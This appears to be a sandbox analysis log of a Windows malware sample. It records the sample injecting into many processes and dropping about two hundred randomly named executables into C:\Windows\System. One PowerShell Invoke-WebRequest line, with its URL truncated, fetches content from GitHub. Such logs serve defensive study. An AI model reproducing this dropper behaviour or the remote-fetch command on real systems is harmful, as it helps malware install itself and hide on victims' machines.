PID 2020 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\vVpRmSL.exe
PID 2020 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\vVpRmSL.exe
PID 2020 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\ZALNYZZ.exe
PID 2020 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\ZALNYZZ.exe
PID 2020 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\ZALNYZZ.exe
PID 2020 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\HXDKlfg.exe
PID 2020 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\HXDKlfg.exe
PID 2020 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\HXDKlfg.exe
PID 2020 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\cJQsBKN.exe
PID 2020 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\cJQsBKN.exe
PID 2020 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\cJQsBKN.exe
PID 2020 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\yNEfsBQ.exe
PID 2020 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\yNEfsBQ.exe
PID 2020 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\yNEfsBQ.exe
PID 2020 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\pPQJomb.exe
PID 2020 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\pPQJomb.exe
PID 2020 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\pPQJomb.exe
PID 2020 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\BfugwXW.exe
PID 2020 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\BfugwXW.exe
PID 2020 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\BfugwXW.exe
PID 2020 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\rTjpKjU.exe
PID 2020 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\rTjpKjU.exe
PID 2020 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\rTjpKjU.exe
PID 2020 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\uzMivXY.exe
PID 2020 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\uzMivXY.exe
PID 2020 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\uzMivXY.exe
PID 2020 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\weKPtyY.exe
PID 2020 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\weKPtyY.exe
PID 2020 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\weKPtyY.exe
PID 2020 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\woPILJW.exe
PID 2020 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\woPILJW.exe
PID 2020 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\woPILJW.exe
PID 2020 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\NYQfXVf.exe
PID 2020 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\NYQfXVf.exe
PID 2020 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\NYQfXVf.exe
PID 2020 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\TqVzJSS.exe
PID 2020 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\TqVzJSS.exe
PID 2020 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\TqVzJSS.exe
PID 2020 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\DdLJuzV.exe
PID 2020 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\DdLJuzV.exe
PID 2020 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\DdLJuzV.exe
PID 2020 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\VrNpAwS.exe
PID 2020 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\VrNpAwS.exe
PID 2020 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\VrNpAwS.exe
PID 2020 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\JfyHCGH.exe
PID 2020 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\JfyHCGH.exe
PID 2020 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\JfyHCGH.exe
PID 2020 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\haWFgvU.exe
PID 2020 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\haWFgvU.exe
PID 2020 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\haWFgvU.exe
PID 2020 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\cDcrWTh.exe
PID 2020 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\cDcrWTh.exe
PID 2020 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\cDcrWTh.exe
PID 2020 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\OIveXLg.exe
PID 2020 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\OIveXLg.exe
PID 2020 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\OIveXLg.exe
PID 2020 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\xiTQnZC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\aqVoOva.exe

C:\Windows\System\aqVoOva.exe

C:\Windows\System\vVpRmSL.exe

C:\Windows\System\vVpRmSL.exe

C:\Windows\System\ZALNYZZ.exe

C:\Windows\System\ZALNYZZ.exe

C:\Windows\System\HXDKlfg.exe

C:\Windows\System\HXDKlfg.exe

C:\Windows\System\cJQsBKN.exe

C:\Windows\System\cJQsBKN.exe

C:\Windows\System\yNEfsBQ.exe

C:\Windows\System\yNEfsBQ.exe

C:\Windows\System\pPQJomb.exe

C:\Windows\System\pPQJomb.exe

C:\Windows\System\BfugwXW.exe

C:\Windows\System\BfugwXW.exe

C:\Windows\System\rTjpKjU.exe

C:\Windows\System\rTjpKjU.exe

C:\Windows\System\uzMivXY.exe

C:\Windows\System\uzMivXY.exe

C:\Windows\System\weKPtyY.exe

C:\Windows\System\weKPtyY.exe

C:\Windows\System\woPILJW.exe

C:\Windows\System\woPILJW.exe

C:\Windows\System\NYQfXVf.exe

C:\Windows\System\NYQfXVf.exe

C:\Windows\System\TqVzJSS.exe

C:\Windows\System\TqVzJSS.exe

C:\Windows\System\DdLJuzV.exe

C:\Windows\System\DdLJuzV.exe

C:\Windows\System\VrNpAwS.exe

C:\Windows\System\VrNpAwS.exe

C:\Windows\System\JfyHCGH.exe

C:\Windows\System\JfyHCGH.exe

C:\Windows\System\haWFgvU.exe

C:\Windows\System\haWFgvU.exe

C:\Windows\System\cDcrWTh.exe

C:\Windows\System\cDcrWTh.exe

C:\Windows\System\OIveXLg.exe

C:\Windows\System\OIveXLg.exe

C:\Windows\System\xiTQnZC.exe

C:\Windows\System\xiTQnZC.exe

C:\Windows\System\ycUdbaO.exe

C:\Windows\System\ycUdbaO.exe

C:\Windows\System\HrEEZgk.exe

C:\Windows\System\HrEEZgk.exe

C:\Windows\System\FEmgXlk.exe

C:\Windows\System\FEmgXlk.exe

C:\Windows\System\tpSrAID.exe

C:\Windows\System\tpSrAID.exe

C:\Windows\System\nWCjBdO.exe

C:\Windows\System\nWCjBdO.exe

C:\Windows\System\RHAbgTb.exe

C:\Windows\System\RHAbgTb.exe

C:\Windows\System\SkuSjEn.exe

C:\Windows\System\SkuSjEn.exe

C:\Windows\System\gWZXiWz.exe

C:\Windows\System\gWZXiWz.exe

C:\Windows\System\mSdipaY.exe

C:\Windows\System\mSdipaY.exe

C:\Windows\System\oEcDPlJ.exe

C:\Windows\System\oEcDPlJ.exe

C:\Windows\System\LjSfRtn.exe

C:\Windows\System\LjSfRtn.exe

C:\Windows\System\ltEwpmd.exe

C:\Windows\System\ltEwpmd.exe

C:\Windows\System\Tznkuoj.exe

C:\Windows\System\Tznkuoj.exe

C:\Windows\System\qOVbIbv.exe

C:\Windows\System\qOVbIbv.exe

C:\Windows\System\TMhyIwk.exe

C:\Windows\System\TMhyIwk.exe

C:\Windows\System\fOSirut.exe

C:\Windows\System\fOSirut.exe

C:\Windows\System\UaJcRsq.exe

C:\Windows\System\UaJcRsq.exe

C:\Windows\System\FDurlUS.exe

C:\Windows\System\FDurlUS.exe

C:\Windows\System\qLcMpCy.exe

C:\Windows\System\qLcMpCy.exe

C:\Windows\System\OiGnedr.exe

C:\Windows\System\OiGnedr.exe

C:\Windows\System\sAlAwdo.exe

C:\Windows\System\sAlAwdo.exe

C:\Windows\System\vhtfHid.exe

C:\Windows\System\vhtfHid.exe

C:\Windows\System\JLcmkyU.exe

C:\Windows\System\JLcmkyU.exe

C:\Windows\System\pDfMsTc.exe

C:\Windows\System\pDfMsTc.exe

C:\Windows\System\QQyAjhu.exe

C:\Windows\System\QQyAjhu.exe

C:\Windows\System\NUADDtB.exe

C:\Windows\System\NUADDtB.exe

C:\Windows\System\qJXbtCe.exe

C:\Windows\System\qJXbtCe.exe

C:\Windows\System\ZJVlUvU.exe

C:\Windows\System\ZJVlUvU.exe

C:\Windows\System\ZFRyHZm.exe

C:\Windows\System\ZFRyHZm.exe

C:\Windows\System\CfcjdpC.exe

C:\Windows\System\CfcjdpC.exe

C:\Windows\System\jVNIKOW.exe

C:\Windows\System\jVNIKOW.exe

C:\Windows\System\YSKljNU.exe

C:\Windows\System\YSKljNU.exe

C:\Windows\System\MfwsQPY.exe

C:\Windows\System\MfwsQPY.exe

C:\Windows\System\olClWJI.exe

C:\Windows\System\olClWJI.exe

C:\Windows\System\WhlZgXK.exe

C:\Windows\System\WhlZgXK.exe

C:\Windows\System\bfocjgN.exe

C:\Windows\System\bfocjgN.exe

C:\Windows\System\HoCvYnz.exe

C:\Windows\System\HoCvYnz.exe

C:\Windows\System\KcLprvQ.exe

C:\Windows\System\KcLprvQ.exe

C:\Windows\System\pmeumvw.exe

C:\Windows\System\pmeumvw.exe

C:\Windows\System\cykSXPy.exe

C:\Windows\System\cykSXPy.exe

C:\Windows\System\QuKgfhh.exe

C:\Windows\System\QuKgfhh.exe

C:\Windows\System\PhASQpC.exe

C:\Windows\System\PhASQpC.exe

C:\Windows\System\DbgUkoM.exe

C:\Windows\System\DbgUkoM.exe

C:\Windows\System\aSeJopj.exe

C:\Windows\System\aSeJopj.exe

C:\Windows\System\wtAolqR.exe

C:\Windows\System\wtAolqR.exe

C:\Windows\System\rXhSyVx.exe

C:\Windows\System\rXhSyVx.exe

C:\Windows\System\NgnebAS.exe

C:\Windows\System\NgnebAS.exe

C:\Windows\System\SySYyIN.exe

C:\Windows\System\SySYyIN.exe

C:\Windows\System\cJiiXTq.exe

C:\Windows\System\cJiiXTq.exe

C:\Windows\System\aKzHVMO.exe

C:\Windows\System\aKzHVMO.exe

C:\Windows\System\iozRcnF.exe

C:\Windows\System\iozRcnF.exe

C:\Windows\System\QzfrvQp.exe

C:\Windows\System\QzfrvQp.exe

C:\Windows\System\DFmrxQi.exe

C:\Windows\System\DFmrxQi.exe

C:\Windows\System\CWTiSVx.exe

C:\Windows\System\CWTiSVx.exe

C:\Windows\System\yjhPlKD.exe

C:\Windows\System\yjhPlKD.exe

C:\Windows\System\RxYxdpC.exe

C:\Windows\System\RxYxdpC.exe

C:\Windows\System\liwiPNS.exe

C:\Windows\System\liwiPNS.exe

C:\Windows\System\zXmnShB.exe

C:\Windows\System\zXmnShB.exe

C:\Windows\System\xWoHdFg.exe

C:\Windows\System\xWoHdFg.exe

C:\Windows\System\YvpNxks.exe

C:\Windows\System\YvpNxks.exe

C:\Windows\System\TZQlnQM.exe

C:\Windows\System\TZQlnQM.exe

C:\Windows\System\WMIzupx.exe

C:\Windows\System\WMIzupx.exe

C:\Windows\System\kPaNsuA.exe

C:\Windows\System\kPaNsuA.exe

C:\Windows\System\rukgmqr.exe

C:\Windows\System\rukgmqr.exe

C:\Windows\System\CEXRLBv.exe

C:\Windows\System\CEXRLBv.exe

C:\Windows\System\guBEoHT.exe

C:\Windows\System\guBEoHT.exe

C:\Windows\System\QJPrTZd.exe

C:\Windows\System\QJPrTZd.exe

C:\Windows\System\CqQXMak.exe

C:\Windows\System\CqQXMak.exe

C:\Windows\System\jBESlMb.exe

C:\Windows\System\jBESlMb.exe

C:\Windows\System\thldajn.exe

C:\Windows\System\thldajn.exe

C:\Windows\System\skKrbyF.exe

C:\Windows\System\skKrbyF.exe

C:\Windows\System\unhnJKo.exe

C:\Windows\System\unhnJKo.exe

C:\Windows\System\svCUBrU.exe

C:\Windows\System\svCUBrU.exe

C:\Windows\System\PNwNJgV.exe

C:\Windows\System\PNwNJgV.exe

C:\Windows\System\LCPRNxm.exe

C:\Windows\System\LCPRNxm.exe

C:\Windows\System\kBVhPfo.exe

C:\Windows\System\kBVhPfo.exe

C:\Windows\System\EZDcXwL.exe

C:\Windows\System\EZDcXwL.exe

C:\Windows\System\dwMxbnh.exe

C:\Windows\System\dwMxbnh.exe

C:\Windows\System\MitSCuz.exe

C:\Windows\System\MitSCuz.exe

C:\Windows\System\IPftbpJ.exe

C:\Windows\System\IPftbpJ.exe

C:\Windows\System\JTIbsZY.exe

C:\Windows\System\JTIbsZY.exe

C:\Windows\System\Iiiztas.exe

C:\Windows\System\Iiiztas.exe

C:\Windows\System\kibBcpn.exe

C:\Windows\System\kibBcpn.exe

C:\Windows\System\hxkjyLf.exe

C:\Windows\System\hxkjyLf.exe

C:\Windows\System\veKXWsL.exe

C:\Windows\System\veKXWsL.exe

C:\Windows\System\YVRFUKZ.exe

C:\Windows\System\YVRFUKZ.exe

C:\Windows\System\JRJLQTw.exe

C:\Windows\System\JRJLQTw.exe

C:\Windows\System\SFwvIyB.exe

C:\Windows\System\SFwvIyB.exe

C:\Windows\System\ggrJoqB.exe

C:\Windows\System\ggrJoqB.exe

C:\Windows\System\RHbAUPW.exe

C:\Windows\System\RHbAUPW.exe

C:\Windows\System\EsMwmUE.exe

C:\Windows\System\EsMwmUE.exe

C:\Windows\System\bNgDTzy.exe

C:\Windows\System\bNgDTzy.exe

C:\Windows\System\YWMvndk.exe

C:\Windows\System\YWMvndk.exe

C:\Windows\System\cTIknvY.exe

C:\Windows\System\cTIknvY.exe

C:\Windows\System\VlZMcLT.exe

C:\Windows\System\VlZMcLT.exe

C:\Windows\System\cWicxoU.exe

C:\Windows\System\cWicxoU.exe

C:\Windows\System\cVbEVTG.exe

C:\Windows\System\cVbEVTG.exe

C:\Windows\System\TgJHwpq.exe

C:\Windows\System\TgJHwpq.exe

C:\Windows\System\iMjZaHp.exe

C:\Windows\System\iMjZaHp.exe

C:\Windows\System\dnMOdDC.exe

C:\Windows\System\dnMOdDC.exe

C:\Windows\System\ZAPELMI.exe

C:\Windows\System\ZAPELMI.exe

C:\Windows\System\hhvOtIY.exe

C:\Windows\System\hhvOtIY.exe

C:\Windows\System\VtQhdJx.exe

C:\Windows\System\VtQhdJx.exe

C:\Windows\System\HlNyXmR.exe

C:\Windows\System\HlNyXmR.exe

C:\Windows\System\AmGOmyt.exe

C:\Windows\System\AmGOmyt.exe

C:\Windows\System\JoowCKP.exe

C:\Windows\System\JoowCKP.exe

C:\Windows\System\uuYdYBz.exe

C:\Windows\System\uuYdYBz.exe

C:\Windows\System\UIYNewb.exe

C:\Windows\System\UIYNewb.exe

C:\Windows\System\Gowdnqf.exe

C:\Windows\System\Gowdnqf.exe

C:\Windows\System\ifRoLwG.exe

C:\Windows\System\ifRoLwG.exe

C:\Windows\System\VMrCVFb.exe

C:\Windows\System\VMrCVFb.exe

C:\Windows\System\RHmSVco.exe

C:\Windows\System\RHmSVco.exe

C:\Windows\System\xclgaqp.exe

C:\Windows\System\xclgaqp.exe

C:\Windows\System\qYZVEGL.exe

C:\Windows\System\qYZVEGL.exe

C:\Windows\System\RBDssGI.exe

C:\Windows\System\RBDssGI.exe

C:\Windows\System\ISvhGCN.exe

C:\Windows\System\ISvhGCN.exe

C:\Windows\System\NQdpXFh.exe

C:\Windows\System\NQdpXFh.exe

C:\Windows\System\VyqsnyC.exe

C:\Windows\System\VyqsnyC.exe

C:\Windows\System\glLGvvb.exe

C:\Windows\System\glLGvvb.exe

C:\Windows\System\HJDNHDB.exe

C:\Windows\System\HJDNHDB.exe

C:\Windows\System\OBcJKSY.exe

C:\Windows\System\OBcJKSY.exe

C:\Windows\System\aLpoDRA.exe

C:\Windows\System\aLpoDRA.exe

C:\Windows\System\huMKKkm.exe

C:\Windows\System\huMKKkm.exe

C:\Windows\System\lwQTEXY.exe

C:\Windows\System\lwQTEXY.exe

C:\Windows\System\aFQzsIo.exe

C:\Windows\System\aFQzsIo.exe

C:\Windows\System\IztVpLO.exe

C:\Windows\System\IztVpLO.exe

C:\Windows\System\dQVcKhn.exe

C:\Windows\System\dQVcKhn.exe

C:\Windows\System\TvXKgGw.exe

C:\Windows\System\TvXKgGw.exe

C:\Windows\System\qSWRIby.exe

C:\Windows\System\qSWRIby.exe

C:\Windows\System\MBKshPA.exe

C:\Windows\System\MBKshPA.exe

C:\Windows\System\AbybTVq.exe

C:\Windows\System\AbybTVq.exe

C:\Windows\System\NlzfuJs.exe

C:\Windows\System\NlzfuJs.exe

C:\Windows\System\PdYifaJ.exe

C:\Windows\System\PdYifaJ.exe

C:\Windows\System\LytEIGf.exe

C:\Windows\System\LytEIGf.exe

C:\Windows\System\NCGYQoJ.exe

C:\Windows\System\NCGYQoJ.exe

C:\Windows\System\CoWAaYZ.exe

C:\Windows\System\CoWAaYZ.exe

C:\Windows\System\sqggaYj.exe

C:\Windows\System\sqggaYj.exe

C:\Windows\System\xBQjrnD.exe

C:\Windows\System\xBQjrnD.exe

C:\Windows\System\sArlFsB.exe

C:\Windows\System\sArlFsB.exe

C:\Windows\System\yhnqCQt.exe

C:\Windows\System\yhnqCQt.exe

C:\Windows\System\LHElfDv.exe

C:\Windows\System\LHElfDv.exe

C:\Windows\System\ZmFoOZw.exe

C:\Windows\System\ZmFoOZw.exe

C:\Windows\System\wHWiFmF.exe

C:\Windows\System\wHWiFmF.exe

C:\Windows\System\VdPKGKs.exe

C:\Windows\System\VdPKGKs.exe

C:\Windows\System\GYSStSh.exe

C:\Windows\System\GYSStSh.exe

C:\Windows\System\lTnyyBA.exe

C:\Windows\System\lTnyyBA.exe

C:\Windows\System\YxnZBHB.exe

C:\Windows\System\YxnZBHB.exe

C:\Windows\System\enHbwxZ.exe

C:\Windows\System\enHbwxZ.exe

C:\Windows\System\MpxUESt.exe

C:\Windows\System\MpxUESt.exe

C:\Windows\System\myvZTJm.exe

C:\Windows\System\myvZTJm.exe

C:\Windows\System\TiZUKdX.exe

C:\Windows\System\TiZUKdX.exe

C:\Windows\System\lYzLEvC.exe

C:\Windows\System\lYzLEvC.exe

C:\Windows\System\KGROpuv.exe

C:\Windows\System\KGROpuv.exe

C:\Windows\System\ItqRBsW.exe

C:\Windows\System\ItqRBsW.exe

C:\Windows\System\nYsSadJ.exe

C:\Windows\System\nYsSadJ.exe

C:\Windows\System\McbgYdO.exe

C:\Windows\System\McbgYdO.exe

C:\Windows\System\rRFWbUS.exe

C:\Windows\System\rRFWbUS.exe

C:\Windows\System\HbffLUT.exe

C:\Windows\System\HbffLUT.exe

C:\Windows\System\mUgnDIS.exe

C:\Windows\System\mUgnDIS.exe

C:\Windows\System\KzoBjtx.exe

C:\Windows\System\KzoBjtx.exe

C:\Windows\System\zJnbCtq.exe

C:\Windows\System\zJnbCtq.exe

C:\Windows\System\kyAFglC.exe

C:\Windows\System\kyAFglC.exe

C:\Windows\System\icABfWl.exe

C:\Windows\System\icABfWl.exe

C:\Windows\System\qmIzJSh.exe

C:\Windows\System\qmIzJSh.exe

C:\Windows\System\xETrdvW.exe

C:\Windows\System\xETrdvW.exe

C:\Windows\System\ivWkuBn.exe

C:\Windows\System\ivWkuBn.exe

C:\Windows\System\PjmjErN.exe

C:\Windows\System\PjmjErN.exe

C:\Windows\System\zMsYacI.exe

C:\Windows\System\zMsYacI.exe

C:\Windows\System\aUhNqoC.exe

C:\Windows\System\aUhNqoC.exe

C:\Windows\System\bRAeowp.exe

C:\Windows\System\bRAeowp.exe

C:\Windows\System\pxewzBm.exe

C:\Windows\System\pxewzBm.exe

C:\Windows\System\qVnuinN.exe

C:\Windows\System\qVnuinN.exe

C:\Windows\System\FZbHxjF.exe

C:\Windows\System\FZbHxjF.exe

C:\Windows\System\TAnIQZG.exe

C:\Windows\System\TAnIQZG.exe

C:\Windows\System\VCkmZyi.exe

C:\Windows\System\VCkmZyi.exe

C:\Windows\System\lxZZsPE.exe

C:\Windows\System\lxZZsPE.exe

C:\Windows\System\IyvPPlf.exe

C:\Windows\System\IyvPPlf.exe

C:\Windows\System\ZUgTUBS.exe

C:\Windows\System\ZUgTUBS.exe

C:\Windows\System\RDQQmbE.exe

C:\Windows\System\RDQQmbE.exe

C:\Windows\System\DMHCWgm.exe

C:\Windows\System\DMHCWgm.exe

C:\Windows\System\dnXQEXE.exe

C:\Windows\System\dnXQEXE.exe

C:\Windows\System\GcrfiGO.exe

C:\Windows\System\GcrfiGO.exe

C:\Windows\System\wuaUPtR.exe

C:\Windows\System\wuaUPtR.exe

C:\Windows\System\iTTOjPY.exe

C:\Windows\System\iTTOjPY.exe

C:\Windows\System\CWnLmTc.exe

C:\Windows\System\CWnLmTc.exe

C:\Windows\System\FaVxilM.exe

C:\Windows\System\FaVxilM.exe

C:\Windows\System\vyzrSKr.exe

C:\Windows\System\vyzrSKr.exe

C:\Windows\System\aNbAtXR.exe

C:\Windows\System\aNbAtXR.exe

C:\Windows\System\XBWPRWc.exe

C:\Windows\System\XBWPRWc.exe

C:\Windows\System\YipsnDC.exe

C:\Windows\System\YipsnDC.exe

C:\Windows\System\aIlTpxf.exe

C:\Windows\System\aIlTpxf.exe

C:\Windows\System\vkImGZx.exe

C:\Windows\System\vkImGZx.exe

C:\Windows\System\EApcWjn.exe

C:\Windows\System\EApcWjn.exe

C:\Windows\System\TqfPrLs.exe

C:\Windows\System\TqfPrLs.exe

C:\Windows\System\RFLFpzM.exe

C:\Windows\System\RFLFpzM.exe

C:\Windows\System\sLBbMxC.exe

C:\Windows\System\sLBbMxC.exe

C:\Windows\System\VBvwtOf.exe

C:\Windows\System\VBvwtOf.exe

C:\Windows\System\qYCWYsu.exe

C:\Windows\System\qYCWYsu.exe

C:\Windows\System\VDPUKLb.exe

C:\Windows\System\VDPUKLb.exe

C:\Windows\System\ehGDGZC.exe

C:\Windows\System\ehGDGZC.exe

C:\Windows\System\koCxEnv.exe

C:\Windows\System\koCxEnv.exe

C:\Windows\System\TIxxqvb.exe

C:\Windows\System\TIxxqvb.exe

C:\Windows\System\aAgPTaj.exe

C:\Windows\System\aAgPTaj.exe

C:\Windows\System\cLqCiiY.exe

C:\Windows\System\cLqCiiY.exe

C:\Windows\System\jOgwxIw.exe

C:\Windows\System\jOgwxIw.exe

C:\Windows\System\ehglIVG.exe

C:\Windows\System\ehglIVG.exe

C:\Windows\System\PrGqGKx.exe

C:\Windows\System\PrGqGKx.exe

C:\Windows\System\ULUwYOc.exe

C:\Windows\System\ULUwYOc.exe

C:\Windows\System\prMoSTo.exe

C:\Windows\System\prMoSTo.exe

C:\Windows\System\ODoqcQe.exe

C:\Windows\System\ODoqcQe.exe

C:\Windows\System\EheGpMK.exe

C:\Windows\System\EheGpMK.exe

C:\Windows\System\HIBiqvi.exe

C:\Windows\System\HIBiqvi.exe

C:\Windows\System\WNKSAeg.exe

C:\Windows\System\WNKSAeg.exe

C:\Windows\System\pbYzvKf.exe

C:\Windows\System\pbYzvKf.exe

C:\Windows\System\tuRcMzw.exe

C:\Windows\System\tuRcMzw.exe

C:\Windows\System\UsRKmvL.exe

C:\Windows\System\UsRKmvL.exe

C:\Windows\System\MuLmkAO.exe

C:\Windows\System\MuLmkAO.exe

